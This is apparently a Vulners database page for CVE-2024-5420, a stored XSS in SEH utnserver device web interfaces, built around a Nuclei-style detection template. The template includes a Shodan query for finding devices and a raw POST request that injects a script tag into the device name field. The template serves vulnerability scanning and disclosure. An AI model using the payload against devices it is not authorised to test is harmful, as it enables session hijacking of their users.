| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| Exploit for CVE-2024-5420 | 2 Sep 202416:39 | – | githubexploit | |
| Exploit for CVE-2024-5420 | 2 Sep 202415:29 | – | githubexploit | |
| CVE-2024-5420 | 4 Jun 202407:48 | – | cve | |
| CVE-2024-5420 Stored Cross-Site Scripting in SEH Computertechnik utnserver Pro | 4 Jun 202407:48 | – | cvelist | |
| CVE-2024-5420 | 4 Jun 202408:15 | – | nvd | |
| SEH utnserver Pro/ProMAX / INU-100 20.1.22 XSS / DoS / File Disclosure | 10 Jun 202400:00 | – | packetstorm | |
| PT-2024-36081 · Seh Computertechnik · Utnserver Pro +2 | 4 Jun 202400:00 | – | ptsecurity | |
| CVE-2024-5420 | 23 May 202509:15 | – | redhatcve | |
| SEH Computertechnik UTN Server PRO and INU-100 Stored Cross-Site Scripting (CVE-2024-5420) | 4 Sep 202400:00 | – | nessus | |
| CVE-2024-5420 Stored Cross-Site Scripting in SEH Computertechnik utnserver Pro | 4 Jun 202407:48 | – | vulnrichment |
id: CVE-2024-5420
info:
name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting
author: bl4ckp4r4d1s3
severity: high
description: |
A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
impact: |
Authenticated attackers can inject malicious JavaScript into the device description field, leading to stored XSS that can hijack user sessions when victims access the interface.
remediation: |
Update SEH utnserver Pro/ProMAX/INU-100 to a version later than 20.1.22 that addresses the XSS vulnerability.
reference:
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
- https://seclists.org/fulldisclosure/2024/Jun/4
- https://nvd.nist.gov/vuln/detail/CVE-2024-5420
- http://seclists.org/fulldisclosure/2024/Jun/4
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
cvss-score: 8.3
cve-id: CVE-2024-5420
cwe-id: CWE-79
epss-score: 0.055
epss-percentile: 0.91829
metadata:
verified: true
max-request: 1
shodan-query: html:"utnserver Control Center"
tags: cve,cve2024,utnserver,seh,xss,seclists,vuln
http:
- raw:
- |
POST /device/description_en.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'value="“><script>alert(document.domain)</script>" id="standort"'
- 'Host name</label>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a0046304402203384cf0f97684e1ca58668f073a7bef2ac6cbeb5f4af3d4830fd7674318eac3d0220092eb28dbeedba35da6a572d2ffb57eeb1df2f12f104586dcaff6225e3628f61:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation